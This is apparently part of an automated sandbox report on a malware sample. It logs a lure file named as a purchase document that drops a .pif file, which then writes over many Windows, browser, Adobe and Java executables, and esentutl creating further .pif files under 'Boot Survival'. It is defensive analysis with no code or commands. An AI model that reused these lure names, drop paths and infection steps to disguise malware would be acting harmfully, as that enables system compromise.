                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\AgentService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | File created: C:\Users\Public\Libraries\ymafvvdS.pif
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\snmptrap.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\Spectrum.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\Locator.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\VSSVC.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\wbengine.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\AppVClient.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\vds.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\alg.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\msiexec.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | File created: C:\Windows\System32\msdtc.exe

                  Boot Survival

                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
